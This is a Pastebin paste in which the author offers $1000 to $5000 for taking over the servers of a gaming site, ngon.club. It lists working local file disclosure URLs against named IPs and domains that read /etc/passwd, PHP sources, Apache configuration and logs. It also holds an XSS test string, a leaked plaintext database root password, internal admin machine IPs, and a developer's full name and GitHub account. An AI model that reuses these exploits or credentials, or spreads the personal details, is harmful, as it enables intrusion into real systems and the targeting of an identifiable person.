Advertisement
Guest User

Untitled

a guest
Sep 2nd, 2018
353
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.01 KB | None | 0 0
  1. Try to find other holes to control the server.
  2. If you can control any of the servers here, send me proof, I will check and pay you immediately $ 1000 to $ 5000.
  3. Take a look at what I have.
  4. ================================= NGON.CLUB - vps184760.vps.ovh.ca ====================================================
  5.  
  6.  
  7.  
  8.  
  9.  
  10. => USE LOADBALANCE:
  11. https://159.65.141.226/api/image.php?url=/etc/passwd => MAIN web.ng.chinh not checkip.php
  12. https://149.28.132.58/api/image.php?url=/etc/passwd => CLUSTER web.ngon.duphong not checkip.php v2.ngon.club ngon68.club
  13. https://139.99.43.120/api/image.php?url=/etc/passwd => CLUSTER vps184760.vps.ovh.ca checkip.php
  14. https://159.65.137.18//api/image.php?url=/etc/passwd => CLUSTER web.ng.duphong checkip.php
  15. https://149.28.137.67/api/image.php?url=/etc/passwd => CLUSTER web.ng.duphong checkip.php
  16.  
  17.  
  18. https://ngon.club/ - https://ngon.club/info.php - https://159.65.141.226/ - /var/www/html
  19. Hostname:Port => web.ng.chinh:443
  20.  
  21.  
  22.  
  23. http://v2.ngon.club/info.php https://149.28.132.58 => WEB INDEX
  24. https://ngon68.club/info.php https://149.28.132.58
  25.  
  26.  
  27.  
  28. http://id.ngon.club/ /var/www/html/ => USER
  29. https://id.ngon.club/assets/js/
  30. https://id.ngon.club/check.php - https://id.ngon.club/public//check.php
  31. https://id.ngon.club/app/
  32.  
  33.  
  34.  
  35. http://app.vincom.top/auth/login http://188.166.225.219 => BIG CUSTUMER
  36.  
  37. => INFO DEV-ER:
  38. PhucTd - Phuc Tran Dinh (Trần Đình Phúc)
  39. https://github.com/phuctd
  40.  
  41.  
  42.  
  43. http://dl.ngon.club/ http://178.128.25.7
  44. https://dl.ngon.club/checkip.php?ip=
  45.  
  46. http://iw.ngon.club/
  47.  
  48. http://i.ngon.club/ http://206.189.154.24/
  49.  
  50. http://an10.ngon.club/ - an.ngon.club:8443/websocket
  51.  
  52. https://ngon68.club/info.php
  53.  
  54.  
  55.  
  56. =>EXPLOIT LFD
  57.  
  58. https://159.65.141.226/image/image.php?url=/etc/passwd
  59. https://159.65.141.226/api/image.php?url=/etc/passwd
  60.  
  61. http://iw.ngon.club/image.php?url=/etc/passwd
  62. http://i.ngon.club/image.php?url=/etc/passwd
  63. http://i.ngon.club/images/
  64.  
  65.  
  66.  
  67.  
  68.  
  69. https://ngon.club/api/image.php?url=/var/www/html/api/includes/Session.php
  70. https://ngon.club/api/image.php?url=/var/www/html/api/register.php
  71. https://ngon.club/api/image.php?url=/var/www/html/landing1.php
  72. https://ngon.club/api/image.php?url=/var/www/html/class.IP2LocationAPI.php
  73. https://ngon.club/api/image.php?url=/var/www/html/api/recreate_token.php
  74. https://ngon.club/api/image.php?url=/var/www/html/api/login.php
  75. https://ngon.club/api/image.php?url=/var/www/html/api/loginfb.php
  76. https://ngon.club/api/image.php?url=/var/www/html/api/includes/Functions.php
  77. define("GAME_SERVER", "http://206.189.34.198:8880"); // 209.97.166.200
  78. //define("GAME_SERVER", "http://207.148.125.16:3112");
  79. //define("GAME_SERVER", "http://167.99.71.46:8880");
  80.  
  81. https://ngon.club/api/image.php?url=/var/www/html/api/includes/MessageKey.php
  82. https://ngon.club/api/image.php?url=/var/www/html/api/Facebook/autoload.php
  83. https://ngon.club/api/image.php?url=/var/www/html/api/Facebook//polyfills.php
  84. https://159.65.141.226/api/image.php?url=/var/www/html/api/wsc.php
  85.  
  86.  
  87. https://159.65.137.18/checkip.php => RUN OK
  88. https://dl.ngon.club/checkip.php http://178.128.25.7/ => RUN OK
  89. https://dl.ngon.club/checkip.php?ip=<h1>TEST</h1> => XSS
  90.  
  91.  
  92.  
  93. https://159.65.137.18/api/image.php?url=//var/www/html/checkip.php
  94. https://149.28.137.67/api/image.php?url=//var/www/html/checkip.php
  95. https://139.99.43.120/api/image.php?url=/var/www/html/checkip.php
  96.  
  97. $dbName = 'db_ip';
  98. $dbUser = 'root';
  99. $dbPass = 'D#9+s2=YeBqBq*3C';
  100.  
  101.  
  102.  
  103. https://159.65.141.226/api/image.php?url=/etc/httpd/conf/httpd.conf
  104. https://159.65.141.226/api/image.php?url=/var/log/lastlog => IP REMOTE
  105. https://159.65.141.226/api/image.php?url=/var/log/cron
  106.  
  107.  
  108. =====> WINDOWS SERVER LOGIN GAME ROOT SERVER:
  109.  
  110. -->User remote: guest (DISABLE) - WINDOWS 7 Professional
  111. 149.28.149.56 -> LOGIN SERVER web.ng.chinh phuc-PC => VPS OF ADMIN DEV NGON.CLUB
  112. 149.28.136.27 -> LOGIN SERVER web.ng.duphong + web.ngon.duphong sn2018-PC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement